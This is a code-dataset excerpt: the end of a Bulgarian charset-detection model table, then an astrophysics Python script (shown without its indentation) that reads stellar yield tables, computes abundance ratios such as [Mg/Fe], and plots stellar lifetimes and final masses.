3,3,2,2,3,0,1,0,1,0,0,0,0,0,0,0,1,1,0,3,0,0,0,0,0,0,0,0,1,0,2,2,
1,1,1,1,1,2,1,1,2,2,1,2,2,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,0,0,
3,1,0,1,0,2,2,2,2,3,2,1,1,1,2,3,0,0,1,0,2,1,1,0,1,1,1,1,2,1,1,1,
1,2,2,1,2,1,2,2,1,1,0,1,2,1,2,2,1,1,1,0,0,1,1,1,2,1,0,1,0,0,0,0,
2,1,0,1,0,3,1,2,2,2,2,1,2,2,1,1,1,0,2,1,2,2,1,1,2,1,1,0,2,1,1,1,
1,2,2,2,2,2,2,2,1,2,0,1,1,0,2,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0,
2,1,1,1,1,2,2,2,2,1,2,2,2,1,2,2,1,1,2,1,2,3,2,2,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,3,2,0,1,2,0,1,2,1,1,0,1,0,1,2,1,2,0,0,0,1,1,0,0,0,1,0,0,2,
1,1,0,0,1,1,0,1,1,1,1,0,2,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,
2,0,0,0,0,1,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,2,1,1,1,
1,2,2,2,2,1,1,2,1,2,1,1,1,0,2,1,2,1,1,1,0,2,1,1,1,1,0,1,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,
1,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,3,2,0,0,0,0,1,0,0,0,0,0,0,1,1,0,2,0,0,0,0,0,0,0,0,1,0,1,2,
1,1,1,1,1,1,0,0,2,2,2,2,2,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,1,
2,3,1,2,1,0,1,1,0,2,2,2,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,2,
1,1,1,1,2,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,
2,2,2,2,2,0,0,2,0,0,2,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,0,2,2,
1,1,1,1,1,0,0,1,2,1,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,2,0,1,1,0,0,0,1,0,0,2,0,2,0,0,0,0,0,0,0,0,0,0,1,1,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,3,2,0,0,1,0,0,1,0,0,0,0,0,0,1,0,2,0,0,0,1,0,0,0,0,0,0,0,2,
1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,1,2,2,2,1,2,1,2,2,1,1,2,1,1,1,0,1,1,1,1,2,0,1,0,1,1,1,1,0,1,1,
1,1,2,1,1,1,1,1,1,0,0,1,2,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,
1,0,0,1,3,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,1,0,0,1,0,2,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,0,2,0,0,1,
0,2,0,1,0,0,1,1,2,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,1,1,0,2,1,0,1,1,1,0,0,1,0,2,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,2,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,
0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,1,2,1,1,1,1,1,1,2,2,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0,
1,1,2,1,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,1,2,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,
1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,2,0,0,2,0,1,0,0,1,0,0,1,
1,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,
1,1,1,1,1,1,1,2,0,0,0,0,0,0,2,1,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
)
Latin5BulgarianModel = {
'charToOrderMap': Latin5_BulgarianCharToOrderMap,
'precedenceMatrix': BulgarianLangModel,
'mTypicalPositiveRatio': 0.969392,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
Win1251BulgarianModel = {
'charToOrderMap': win1251BulgarianCharToOrderMap,
'precedenceMatrix': BulgarianLangModel,
'mTypicalPositiveRatio': 0.969392,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
# flake8: noqa
| mit |
Azeret/galIMF | plot_stellar_yield_table.py | 1 | 38495 | import time
import math
import matplotlib.pyplot as plt
import numpy as np
from scipy import interpolate
import element_abundances_solar
reference_name = 'Anders1989'
H_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'H')
# He_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'He')
C_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'C')
# N_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'N')
O_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'O')
Mg_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'Mg')
Fe_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'Fe')
Si_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'Si')
Ca_abundances_solar = element_abundances_solar.function_solar_element_abundances(reference_name, 'Ca')
def plot_lifetime_and_finalmass():
Z2_list = [0.0004, 0.004, 0.008, 0.012]
file = open('yield_tables/rearranged/setllar_final_mass_from_portinari98/portinari98_Z=0.004.txt', 'r')
data = file.readlines()
file.close()
list2 = str.split(data[3])
list_ini_mass = []
for j in list2:
list_ini_mass.append(math.log(float(j), 10))
list_fin_mass = []
i = len(Z2_list) - 1
while i > -1:
file = open('yield_tables/rearranged/setllar_final_mass_from_portinari98/portinari98_Z={}.txt'.format(Z2_list[i]), 'r')
data = file.readlines()
file.close()
list2 = str.split(data[5])
list3 = []
for j in list2:
list3.append(math.log(float(j), 10))
list = [float(data[1]), list3]
list_fin_mass.append(list)
(i) = (i - 1)
color_list_ = []
for i in range(len(list_fin_mass)):
ZZZ = list_fin_mass[i][0]
Z_box = math.log(ZZZ, 10) - math.log(0.01886, 10)
color_list_.append(round(((Z_box+7)**4.001 - (-6.001 + 7) ** 4.001) / ((1 + 7) ** 4.001 - (-6.001 + 7) ** 4.001) * 1000))
colors = plt.cm.hsv_r(np.linspace(0, 1, 1000))
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(21, figsize=(4, 3.5))
# plt.xlim(-1.5, 2.5)
# plt.ylim(-1.5, 1.5)
# i = len(Z2_list) - 1
# while i > -1:
# plt.plot(list_ini_mass, list_fin_mass[i][1], label='Z={}'.format(list_fin_mass[i][0]))
# (i) = (i - 1)
# plt.plot([-2, 3], [-2, 3], ls='dashed', c='k', lw=0.7)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$ [$M_\odot$])')
# plt.ylabel(r'log$_{10}$($M_{\rm *, final}$ [$M_\odot$])')
# plt.tight_layout()
# plt.savefig('Interpolated_stellar_final_mass.pdf', dpi=250)
list_lifetime = []
i = len(Z2_list) - 1
while i > -1:
file = open(
'yield_tables/rearranged/setllar_lifetime_from_portinari98/portinari98_Z={}.txt'.format(Z2_list[i]), 'r')
data = file.readlines()
file.close()
list2 = str.split(data[5])
list3 = []
for j in list2:
list3.append(math.log(float(j), 10))
list = [float(data[1]), list3]
list_lifetime.append(list)
(i) = (i - 1)
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(22, figsize=(4, 3.5))
# plt.xlim(-1.5, 2.5)
# plt.ylim(6, 15)
# i = len(Z2_list) - 1
# while i > -1:
# plt.plot(list_ini_mass, list_lifetime[i][1], label='Z={}'.format(list_fin_mass[i][0]))
# (i) = (i - 1)
# # plt.plot([-2, 3], [-2, 3], ls='dashed', c='k', lw=0.7)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$ [$M_\odot$])')
# plt.ylabel(r'log$_{10}$(life time [yr])')
# plt.tight_layout()
# plt.savefig('Interpolated_stellar_lifetime.pdf', dpi=250)
##########
Metallicity_origen = [0.008, 0.02]
Age_origen = [
[6.47E+10, 3.54E+10, 2.09E+10, 1.30E+10, 8.46E+09, 5.72E+09, 4.12E+09, 2.92E+09, 2.36E+09, 2.18E+09, 1.82E+09,
1.58E+09, 1.41E+09, 1.25E+09, 1.23E+09, 6.86E+08, 4.12E+08, 1.93E+08, 1.15E+08, 7.71E+07, 5.59E+07, 3.44E+07,
2.10E+07, 1.49E+07, 1.01E+07, 6.65E+06, 5.30E+06, 4.15E+06, 3.44E+06, 3.32E+06],
[7.92E+10, 4.45E+10, 2.61E+10, 1.59E+10, 1.03E+10, 6.89E+09, 4.73E+09, 3.59E+09, 2.87E+09, 2.64E+09, 2.18E+09,
1.84E+09, 1.59E+09, 1.38E+09, 1.21E+09, 7.64E+08, 4.56E+08, 2.03E+08, 1.15E+08, 7.45E+07, 5.31E+07, 3.17E+07,
1.89E+07, 1.33E+07, 9.15E+06, 6.13E+06, 5.12E+06, 4.12E+06, 3.39E+06, 3.23E+06]]
Age_012 = []
for i in range(len(Age_origen[0])):
Age_012.append((Age_origen[0][i]*2+Age_origen[1][i])/3)
Remnant_mass_origen = [
[1.35, 1.48, 1.84, 2.04, 6.9, 12.5, 5.69, 9.89],
[1.31, 1.44, 1.87, 2.11, 7.18, 2.06, 2.09, 2.11]
]
Remnant_mass_012 = []
for i in range(len(Remnant_mass_origen[0])):
Remnant_mass_012.append((Remnant_mass_origen[0][i]*2+Remnant_mass_origen[1][i])/3)
Mass = [0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5,
1.6, 1.7, 1.8, 1.9, 2.0, 2.5, 3.0, 4.0, 5.0, 6.0,
7.0, 9.0, 12., 15., 20., 30., 40., 60., 100, 120]
Metallicity = [0.0004, 0.004, 0.008, 0.12]
Age = [
[4.28E+10, 2.37E+10, 1.41E+10, 8.97E+09, 6.03E+09, 4.23E+09, 3.08E+09, 2.34E+09, 1.92E+09, 1.66E+09, 1.39E+09,
1.18E+09, 1.11E+09, 9.66E+08, 8.33E+08, 4.64E+08, 3.03E+08, 1.61E+08, 1.01E+08, 7.15E+07, 5.33E+07, 3.42E+07,
2.13E+07, 1.54E+07, 1.06E+07, 6.90E+06, 5.45E+06, 4.20E+06, 3.32E+06, 3.11E+06],
[5.35E+10, 2.95E+10, 1.73E+10, 1.09E+10, 7.13E+09, 4.93E+09, 3.52E+09, 2.64E+09, 2.39E+09, 1.95E+09, 1.63E+09,
1.28E+09, 1.25E+09, 1.23E+09, 1.08E+09, 5.98E+08, 3.67E+08, 1.82E+08, 1.11E+08, 7.62E+07, 5.61E+07, 3.51E+07,
2.14E+07, 1.52E+07, 1.05E+07, 6.85E+06, 5.44E+06, 4.19E+06, 3.38E+06, 3.23E+06],
[6.47E+10, 3.54E+10, 2.09E+10, 1.30E+10, 8.46E+09, 5.72E+09, 4.12E+09, 2.92E+09, 2.36E+09, 2.18E+09, 1.82E+09,
1.58E+09, 1.41E+09, 1.25E+09, 1.23E+09, 6.86E+08, 4.12E+08, 1.93E+08, 1.15E+08, 7.71E+07, 5.59E+07, 3.44E+07,
2.10E+07, 1.49E+07, 1.01E+07, 6.65E+06, 5.30E+06, 4.15E+06, 3.44E+06, 3.32E+06],
Age_012]
len_mass = len(Mass)
log_Mass = []
for i in range(len_mass):
log_Mass.append(math.log(Mass[i], 10))
len_metal = len(Metallicity)
log_Metallicity = []
for i in range(len_metal):
log_Metallicity.append(math.log(Metallicity[i], 10))
log_Age = []
for i in range(len_metal):
log_Age.append([])
for j in range(len_mass):
log_Age[i].append(math.log(Age[i][j], 10))
fig, axs = plt.subplots(2, 1, sharex=True, figsize=(4, 4))
i = 0
while i < len(Z2_list):
ZZZ = list_fin_mass[i][0]
Z_box = round(math.log(ZZZ, 10)-math.log(0.01886, 10), 2)
axs[0].plot(list_ini_mass, list_lifetime[i][1], lw=(6-i)/2, label='Z={}, [Z]={}'.format(ZZZ, Z_box), color=colors[color_list_[i]])
(i) = (i + 1)
i = len_metal-1
# while i > -1:
# axs[0].scatter(log_Mass, log_Age[i], s=3, marker='*', edgecolors='w', linewidth='0.1', zorder=10)
# (i) = (i - 1)
axs[0].plot([-1, 2], [7, 7])
axs[0].plot([math.log(17, 10), math.log(17, 10)], [6, 15])
# axs[0].set_yticks(np.arange(6, 16, 2))
axs[0].set_ylim(6, 15)
axs[0].set_ylabel(r'log$_{10}$(life time [yr])')
axs[0].legend(prop={'size': 6}, loc='best')
Mass = [
[9, 12, 15, 20, 30, 40, 60, 100, 120],
[9, 12, 15, 20, 30, 40, 100, 120],
[9, 12, 15, 20, 30, 40, 60, 120],
[9, 12, 15, 20, 30, 40, 60, 120]
]
Metallicity = [0.0004, 0.004, 0.008, 0.12]
Remnant_mass = [
[1.35, 1.5, 1.8, 2.07, 6.98, 14.91, 24.58, 32.06, 30.6],
[1.35, 1.5, 1.82, 2.04, 6.98, 12.6, 36.7, 35.2],
[1.35, 1.48, 1.84, 2.04, 6.9, 12.5, 5.69, 9.89],
Remnant_mass_012
]
#################################################################
# WW95_solar = 0.01886
# Metallicity_WW95 = [0, WW95_solar*10**-4, WW95_solar*0.01, WW95_solar*0.1, WW95_solar]
# Mass_WW95 = [12, 13, 15, 18, 20, 22, 25, 30, 35, 40]
# Remnant_mass_WW95_B = [
# [1.32, 1.46, 1.43, 1.76, 2.06, 2.02, 2.07, 1.94, 3.86, 5.45],
# [1.38, 1.31, 1.49, 1.69, 1.97, 2.12, 1.99, 2.01, 3.39, 4.45],
# [1.40, 1.44, 1.56, 1.58, 1.98, 2.04, 1.87, 2.21, 2.42, 4.42],
# [1.28, 1.44, 1.63, 1.61, 1.97, 2.01, 1.87, 2.08, 3.03, 4.09],
# [1.35, 1.28, 1.53, 3.40, 4.12, 1.49, 1.90, 1.54, 7.62, 12.2]
# ]
# Interpolation_remnant_mass_WW95_B = interpolate.interp2d(Mass_WW95, Metallicity_WW95, Remnant_mass_WW95_B)
# Remnant_mass_WW95_B_new = []
# for i in range(len(Metallicity)):
# Remnant_mass_WW95_B_new.append([])
# for j in range(len(Mass_WW95)):
# Remnant_mass_WW95_B_new[i].append(Interpolation_remnant_mass_WW95_B(Mass_WW95[j], Metallicity[i]))
#
# log_Remnant_mass_WW95_B = []
# for i in range(len_metal):
# log_Remnant_mass_WW95_B.append([])
# for j in range(len(Remnant_mass_WW95_B[i])):
# log_Remnant_mass_WW95_B[i].append(math.log(Remnant_mass_WW95_B[i][j], 10))
#
# log_mass_WW95 = []
# for i in range(len(Mass_WW95)):
# log_mass_WW95.append(math.log(Mass_WW95[i], 10))
#################################################################
len_metal = len(Metallicity)
log_Metallicity = []
for i in range(len_metal):
log_Metallicity.append(math.log(Metallicity[i], 10))
log_Remnant_mass = []
for i in range(len_metal):
log_Remnant_mass.append([])
for j in range(len(Remnant_mass[i])):
log_Remnant_mass[i].append(math.log(Remnant_mass[i][j], 10))
log_mass = []
for i in range(len_metal):
log_mass.append([])
for j in range(len(Mass[i])):
log_mass[i].append(math.log(Mass[i][j], 10))
# print(log_mass)
# print(len(log_mass[0]))
# print(len(log_mass))
# print(len(log_Remnant_mass[0]))
i = 0
while i < len(Z2_list):
axs[1].plot(list_ini_mass, list_fin_mass[i][1], lw=(6-i)/2, label='Z={}'.format(list_fin_mass[i][0]), color=colors[color_list_[i]])
(i) = (i + 1)
i = len_metal-1
# while i > -1:
# axs[1].scatter(log_mass[i], log_Remnant_mass[i], s=10, marker='*', edgecolors='w', linewidth='0.1', zorder=10)
# (i) = (i - 1)
# i = len_metal-1
# # while i > -1:
# # axs[1].scatter(log_mass_WW95, log_Remnant_mass_WW95_B[i], s=10, marker='^', edgecolors='w', linewidth='0.1', zorder=10)
# # (i) = (i - 1)
axs[1].set_yticks(np.arange(-2, 2, 1))
axs[1].set_ylim(-1.5, 1.5)
axs[1].set_ylabel(r'log$_{10}(M_{\rm *, final}$ [$M_\odot$])')
axs[1].set_xlabel(r'log$_{10}(M_{\rm *, initial}$ [$M_\odot$])')
plt.tight_layout()
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
plt.savefig('Interpolated_stellar_lifetime_final_mass.pdf', dpi=250)
plt.show()
return
def function_read_file(yield_table_name):
####################
### read in file ###
####################
if yield_table_name == "portinari98":
file_yield = open(
'yield_tables/agb_and_massive_stars_portinari98_marigo01_gce_totalyields.txt', 'r')
# 'yield_tables/agb_and_massive_stars_portinari98_marigo01.txt', 'r')
# Use net yields of Portinari and Marigo
# Net yields with masses up to 7Msun are from Marigo, above those of Portinari are taken.
# Only isotopes are selected which are available in both yield sets and go up to Fe.
# Initial masses go from the lowest mass available up to 100Msun.
# Yield set ID M01P98 in Ritter et al. 2017.
# References: Marigo et al. 2001, http://ukads.nottingham.ac.uk/abs/2001A%26A...370..194M
# Portinari et al. 1998, http://ukads.nottingham.ac.uk/abs/1998A%26A...334..505P
data = file_yield.readlines()
file_yield.close()
elif yield_table_name == "Kobayashi06":
file_yield = open(
'yield_tables/agb_and_massive_stars_Kobayashi06_marigo01_gce_totalyields.txt', 'r')
# Use net yields of Woosley S. E., Weaver T. A., 1995, ApJS, 101, 181 (WW95)
# Use WW95 model B which has the highest [Mg/Fe].
data = file_yield.readlines()
file_yield.close()
elif yield_table_name == "WW95":
file_yield = open(
'yield_tables/massive_stars_WW95_totalyields.txt', 'r')
# Use net yields of Woosley S. E., Weaver T. A., 1995, ApJS, 101, 181 (WW95)
# Use WW95 model B which has the highest [Mg/Fe].
data = file_yield.readlines()
file_yield.close()
elif yield_table_name == "marigo01":
file_yield = open(
'yield_tables/agb_marigo01_totalyields.txt', 'r')
data = file_yield.readlines()
file_yield.close()
###########################
### extract information ###
###########################
#
H_relative_line_number = function_get_element_line_number(data, 'H-1')
He_relative_line_number = function_get_element_line_number(data, 'He-4')
C_relative_line_number = function_get_element_line_number(data, 'C-12')
N_relative_line_number = function_get_element_line_number(data, 'N-14')
O_relative_line_number = function_get_element_line_number(data, 'O-16')
Ne_relative_line_number = function_get_element_line_number(data, 'Ne-20')
Mg_relative_line_number = function_get_element_line_number(data, 'Mg-24')
Si_relative_line_number = function_get_element_line_number(data, 'Si-28')
S_relative_line_number = function_get_element_line_number(data, 'S-32')
Ca_relative_line_number = function_get_element_line_number(data, 'Ca-40')
Fe_relative_line_number = function_get_element_line_number(data, 'Fe-56')
#
global M_list, Z_list, eject_mass_list, H_eject_mass_list, He_eject_mass_list, C_eject_mass_list, \
N_eject_mass_list, O_eject_mass_list, Ne_eject_mass_list, Mg_eject_mass_list, Si_eject_mass_list, \
S_eject_mass_list, Ca_eject_mass_list, Fe_eject_mass_list, Metal_eject_mass_list
global O_over_Mg_list, Mg_over_Fe_list, Ca_over_Fe_list, Si_over_Fe_list, C_over_H_list, Mg_over_H_list, \
Si_over_H_list, Fe_over_H_list, O_over_H_list, Z_over_H_list, \
Z_over_X_list, Z_over_Z0_list, XXX_list, YYY_list, ZZZ_list, O_over_Fe_list
#
i = len(data)-1
while i > -1:
line_i = str.split(data[i])
if line_i[1] == 'Table:':
line_H = str.split(data[i + H_relative_line_number])
line_He = str.split(data[i + He_relative_line_number])
line_C = str.split(data[i + C_relative_line_number])
line_N = str.split(data[i + N_relative_line_number])
line_O = str.split(data[i + O_relative_line_number])
line_Ne = str.split(data[i + Ne_relative_line_number])
line_Mg = str.split(data[i + Mg_relative_line_number])
line_Si = str.split(data[i + Si_relative_line_number])
line_S = str.split(data[i + S_relative_line_number])
line_Ca = str.split(data[i + Ca_relative_line_number])
line_Fe = str.split(data[i + Fe_relative_line_number])
line_Mfinal = str.split(data[i + 2])
(Z, M) = function_get_Z_M(line_i[2]) # metallicity and mass of the star
ejecta_mass = round((M - function_get_Mfinal(line_Mfinal[2])), 5) ####################
H_mass = function_get_element_mass(line_H[1])
He_mass = function_get_element_mass(line_He[1])
C_mass = function_get_element_mass(line_C[1])
N_mass = function_get_element_mass(line_N[1])
O_mass = function_get_element_mass(line_O[1])
Ne_mass = function_get_element_mass(line_Ne[1])
Mg_mass = function_get_element_mass(line_Mg[1])
Si_mass = function_get_element_mass(line_Si[1])
S_mass = function_get_element_mass(line_S[1])
Ca_mass = function_get_element_mass(line_Ca[1])
Fe_mass = function_get_element_mass(line_Fe[1])
H_num = H_mass/1.0079
C_num = C_mass/12.011
N_num = N_mass/14.007
O_num = O_mass/15.9994
Ne_num = Ne_mass/20.18
Mg_num = Mg_mass/24.305
Si_num = Si_mass/28.085
S_num = S_mass/32.06
Ca_num = Ca_mass/40.078
Fe_num = Fe_mass/55.845
Metal_num = C_num+N_num+O_num+Ne_num+Mg_num+Si_num+S_num+Ca_num+Fe_num
O_over_Mg = math.log(O_num/Mg_num, 10) - O_abundances_solar + Mg_abundances_solar
Mg_over_H = math.log(Mg_num/H_num, 10) - Mg_abundances_solar + H_abundances_solar
Si_over_H = math.log(Si_num/H_num, 10) - Si_abundances_solar + H_abundances_solar
C_over_H = math.log(C_num/H_num, 10) - C_abundances_solar + H_abundances_solar
Fe_over_H = math.log(Fe_num/H_num, 10) - Fe_abundances_solar + H_abundances_solar
O_over_H = math.log(O_num/H_num, 10) - O_abundances_solar + H_abundances_solar
Mg_over_Fe = math.log(Mg_num/Fe_num, 10) - Mg_abundances_solar + Fe_abundances_solar
Ca_over_Fe = math.log(Ca_num/Fe_num, 10) - Ca_abundances_solar + Fe_abundances_solar
Si_over_Fe = math.log(Si_num/Fe_num, 10) - Si_abundances_solar + Fe_abundances_solar
O_over_Fe = math.log(O_num/Fe_num, 10) - O_abundances_solar + Fe_abundances_solar
Metal_mass = round((ejecta_mass - H_mass - He_mass), 5) ####################
# Metal_mass = round((C_mass+N_mass+O_mass+Ne_mass+Mg_mass+Si_mass+S_mass+Ca_mass+Fe_mass), 5) ###### the same ######
if Metal_mass<0:
print("Warning: Metal_mass=", Metal_mass, "<0")
print("check stellar yield table with metallicity and mass being:", Z, "&", M)
Metal_mass = 0
Z_over_X = math.log(Metal_mass / H_mass, 10) - math.log(0.01886 / 0.7381, 10)
Z_over_Z0 = math.log(Metal_mass / ejecta_mass, 10) - math.log(0.01886, 10)
Z_over_H = math.log(Metal_num / H_num, 10) - math.log(0.01886 / 18 / 0.7381, 10) # where 18 is the estimated average atomic weight over the weight of hydrogen.
XXX = H_mass / ejecta_mass
YYY = He_mass / ejecta_mass
ZZZ = Metal_mass / ejecta_mass
if len(Z_list) == 0:
Z_list.append(Z)
Z_n = 0
M_list.append([])
eject_mass_list.append([])
H_eject_mass_list.append([])
He_eject_mass_list.append([])
C_eject_mass_list.append([])
N_eject_mass_list.append([])
O_eject_mass_list.append([])
Ne_eject_mass_list.append([])
Mg_eject_mass_list.append([])
Si_eject_mass_list.append([])
S_eject_mass_list.append([])
Ca_eject_mass_list.append([])
Fe_eject_mass_list.append([])
Metal_eject_mass_list.append([])
Z_over_H_list.append([])
Z_over_X_list.append([])
Z_over_Z0_list.append([])
XXX_list.append([])
YYY_list.append([])
ZZZ_list.append([])
O_over_Mg_list.append([])
Mg_over_Fe_list.append([])
Si_over_Fe_list.append([])
Ca_over_Fe_list.append([])
Mg_over_H_list.append([])
Si_over_H_list.append([])
C_over_H_list.append([])
Fe_over_H_list.append([])
O_over_H_list.append([])
O_over_Fe_list.append([])
if Z != Z_list[-1]:
Z_list.append(Z)
Z_n += 1
M_list.append([])
eject_mass_list.append([])
H_eject_mass_list.append([])
He_eject_mass_list.append([])
C_eject_mass_list.append([])
N_eject_mass_list.append([])
O_eject_mass_list.append([])
Ne_eject_mass_list.append([])
Mg_eject_mass_list.append([])
Si_eject_mass_list.append([])
S_eject_mass_list.append([])
Ca_eject_mass_list.append([])
Fe_eject_mass_list.append([])
Metal_eject_mass_list.append([])
O_over_Mg_list.append([])
Mg_over_Fe_list.append([])
Ca_over_Fe_list.append([])
Si_over_Fe_list.append([])
Mg_over_H_list.append([])
Si_over_H_list.append([])
C_over_H_list.append([])
Fe_over_H_list.append([])
O_over_H_list.append([])
Z_over_H_list.append([])
Z_over_X_list.append([])
Z_over_Z0_list.append([])
XXX_list.append([])
YYY_list.append([])
ZZZ_list.append([])
O_over_Fe_list.append([])
M_list[Z_n].append(M)
eject_mass_list[Z_n].append(ejecta_mass)
H_eject_mass_list[Z_n].append(H_mass)
He_eject_mass_list[Z_n].append(He_mass)
C_eject_mass_list[Z_n].append(C_mass)
N_eject_mass_list[Z_n].append(N_mass)
O_eject_mass_list[Z_n].append(O_mass)
Ne_eject_mass_list[Z_n].append(Ne_mass)
Mg_eject_mass_list[Z_n].append(Mg_mass)
Si_eject_mass_list[Z_n].append(Si_mass)
S_eject_mass_list[Z_n].append(S_mass)
Ca_eject_mass_list[Z_n].append(Ca_mass)
Fe_eject_mass_list[Z_n].append(Fe_mass)
Metal_eject_mass_list[Z_n].append(Metal_mass)
O_over_Mg_list[Z_n].append(O_over_Mg)
Mg_over_Fe_list[Z_n].append(Mg_over_Fe)
Ca_over_Fe_list[Z_n].append(Ca_over_Fe)
Si_over_Fe_list[Z_n].append(Si_over_Fe)
Mg_over_H_list[Z_n].append(Mg_over_H)
Si_over_H_list[Z_n].append(Si_over_H)
C_over_H_list[Z_n].append(C_over_H)
O_over_H_list[Z_n].append(O_over_H)
Z_over_H_list[Z_n].append(Z_over_H)
Z_over_X_list[Z_n].append(Z_over_X)
Z_over_Z0_list[Z_n].append(Z_over_Z0)
XXX_list[Z_n].append(XXX)
YYY_list[Z_n].append(YYY)
ZZZ_list[Z_n].append(ZZZ)
Fe_over_H_list[Z_n].append(Fe_over_H)
O_over_Fe_list[Z_n].append(O_over_Fe)
(i) = (i - 1)
return
def function_get_Mfinal(Mfinal_string):
i_end = len(Mfinal_string)
i = 0
mass_str = ''
while i < i_end:
mass_str += Mfinal_string[i]
(i) = (i + 1)
mass = float(mass_str)
return mass
def function_get_element_mass(element_mass_string):
i_end = len(element_mass_string)
i = 1
mass_str = ''
while i < i_end:
mass_str += element_mass_string[i]
(i) = (i + 1)
mass = float(mass_str)
return mass
def function_get_element_line_number(data, element):
i = 0
while i < len(data):
line_i = str.split(data[i])
if line_i[1] == 'Table:':
start = i
j = 0
while j < 100:
line_j = str.split(data[j])
if line_j[0] == '&'+element:
end = j
element_relative_line_number = j - i
break
(j) = (j+1)
break
(i) = (i + 1)
return element_relative_line_number
def function_get_Z_M(M_Z_string):
i = 0
i_M_start = 0
i_M_end = 0
i_Z_start = 0
i_Z_end = 0
while i < len(M_Z_string):
if M_Z_string[i] == 'M':
i_M_start = i+2
if M_Z_string[i] == ',':
i_M_end = i
i_Z_start = i+3
if M_Z_string[i] == ')':
i_Z_end = i
(i) = (i+1)
i = i_Z_start
Z_str = ''
while i < i_Z_end:
Z_str += M_Z_string[i]
(i) = (i + 1)
Z = float(Z_str)
i = i_M_start
M_str = ''
while i < i_M_end:
M_str += M_Z_string[i]
(i) = (i + 1)
M = float(M_str)
return (Z, M)
